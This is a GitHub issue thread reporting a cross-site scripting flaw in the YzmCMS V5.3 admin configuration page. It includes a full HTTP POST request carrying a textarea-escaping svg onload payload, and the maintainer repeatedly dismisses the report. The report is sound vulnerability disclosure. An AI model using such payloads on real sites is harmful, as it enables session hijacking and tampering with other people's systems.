### ISSUE TITLE
Cross Site Scripting Vulnerability in V5.3

### ISSUE THREAD

**Issue by mcsrc** [yzmcms/yzmcms#23]
Cross Site Scripting Vulnerability in Latest Release V5.3

Hi, I would like to report Cross Site Scripting vulnerability in latest release.

Description:
Cross-site scripting (XSS) vulnerability in user_config_add.html

Steps To Reproduce:
1、login Admin System
2、 post request to the url:http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html
POST /yzmcms/admin/system_manage/user_config_add.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Connection: close
Cookie: PHPSESSID=k4dafqe9b04u2p2ju6g64hgn82; yzmphp_adminid=1d78viNOO9T8ddPsGYR-xrM2srKz9tBbqfyBZ7rV; yzmphp_adminname=e13bKxrZ6xK77cZSeoTAByQ4TMh8TJ-0sjj_S152zHrCBic

name=d&fieldtype=textarea&value='%22%2F%3E%3C%2Ftextarea%3E%3Csvg+onload%3Dalert('h1')%3E%2F%2F&title=dd&status=1&dosubmit=1
![image](https://user-images.githubusercontent.com/53854694/62604347-78534980-b92a-11e9-8df2-777877aa6029.png)
3 click this：
![image](https://user-images.githubusercontent.com/53854694/62604383-8c974680-b92a-11e9-8a0e-9269d22554f1.png)
![image](https://user-images.githubusercontent.com/53854694/62604425-a3d63400-b92a-11e9-8ca1-24dd11af4231.png)

Release Info:
V5.3

**Comment by mcsrc** [comment]
Hi. Is the vulnerability valid? Thank you!

在 2019-08-12 23:32:54，"袁志蒙" <notifications@github.com> 写道：

**Comment by yzmcms** [comment]
It's no use at all.

**Comment by yzmcms** [comment]
It's no use at all.

**Comment by yzmcms** [comment]
It's no use at all.
